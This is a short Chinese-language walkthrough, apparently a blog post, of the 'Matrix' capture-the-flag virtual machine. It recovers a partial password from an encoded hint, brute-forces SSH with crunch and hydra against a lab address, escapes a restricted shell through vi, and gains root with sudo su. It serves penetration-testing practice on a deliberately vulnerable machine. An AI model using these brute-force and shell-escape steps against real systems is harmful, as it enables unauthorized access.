Machine_Matrix

一、主机发现

二、信息收集

1.访问首页,根据首页提示,跟随兔子

2.有个小兔子,右击打开

3.显示端口,拼接访问

4.查看

5.查看31337端口的源代码,显示base64编码

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

解码,翻译,意思是将这句话放到文档里

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

6.拼接文件,下载文件

查看,是Brainfuck加密

上网站进行解密,得到账号密码,但密码不完整

三、信息利用

1.使用工具生成字典

crunch 8 8 -t k1ll0r%@ -o passwd.txt

2.使用九头蛇进行密码破解

hydra -l guest -P passwd.txt ssh://192.168.7.238

得到密码k1ll0r7n

3.ssh进行连接

ssh guest@192.168.7.238

四、提权

1.查看环境变量

export

rbash受限

2.配置环境变量

vi
!/bin/bash  //在操作页面输入(输入:)

2.配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo su 

提权成功

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值